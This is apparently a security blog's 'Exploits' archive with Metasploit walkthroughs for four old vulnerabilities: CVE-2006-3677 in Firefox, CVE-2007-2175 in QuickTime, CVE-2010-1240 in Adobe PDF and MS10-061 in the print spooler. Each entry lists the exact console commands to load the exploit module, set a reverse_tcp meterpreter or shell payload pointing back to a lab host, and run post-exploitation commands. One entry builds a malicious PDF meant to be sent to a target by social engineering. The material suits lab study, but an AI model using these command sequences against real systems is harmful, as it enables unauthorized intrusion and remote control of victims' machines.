Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI on 2006-06-16
Coordinated vulnerability disclosure on 2006-07-26
PoC provided by hdm on 2006-07-27
Metasploit PoC provided on 2006-07-30

PoC provided by :

hdm

Reference(s) :

CVE-2006-3677
MFSA 2006-45
ZDI-06-025

Affected version(s) :

Firefox versions prior to 1.5.0.5

Tested on Windows XP SP3 with :

Firefox 1.5.0.4

Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.

Commands :

use exploit/multi/browser/mozilla_navigatorjava
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2007-2175 : Apple QTJava toQTPointer() Arbitrary Memory Access

Timeline :

Vulnerability discovered by Shane Macaulay & Dino Dai Zovi during CanSecWest 2007
Vulnerability reported to ZDI by Dino A. Dai Zovi & Shane Macaulay
Vulnerability reported to the vendor by ZDI on 2007-04-23
Coordinated vulnerability disclosure on 2007-05-01
Metasploit PoC provided on 2007-05-29

PoC provided by :

hdm
kf
ddz

Reference(s) :

CVE-2007-2175
ZDI-07-023

Affected version(s) :

QuickTime 7 versions prior to 7.1.6 for Windows and OS X

Tested on Windows XP SP3 with :

QuickTime 7.1.5

Description :

This module exploits an arbitrary memory access vulnerability in the QuickTime for Java API provided with QuickTime 7.

Commands :

use exploit/multi/browser/qtjava_pointer
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-1240 : Adobe PDF Embedded EXE Social Engineering

Timeline :

Vulnerability discovered & disclosed by Didier Stevens on 2010-03-29
Exploit-DB PoC provided by Didier Stevens on 2010-03-31

PoC provided by :

jduck
Colin Ames

Reference(s) :

CVE-2010-1240
EDB-ID-11987

Affected version(s) :

Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh

Tested on Windows XP SP3 with :

Adobe Reader 9.3.0

Description :

This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.

Commands :

use exploit/windows/fileformat/adobe_pdf_embedded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
dir

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Timeline :

Vulnerability exploited by the Stuxnet worm
Security update released by Microsoft (KB2347290) on 2010-09-14
Metasploit PoC released on 2010-09-17

PoC provided by :

jduck
hdm

Reference(s) :

CVE-2010-2729
MS10-061

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32-bit and Windows Server 2008 32-bit SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32-bit
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig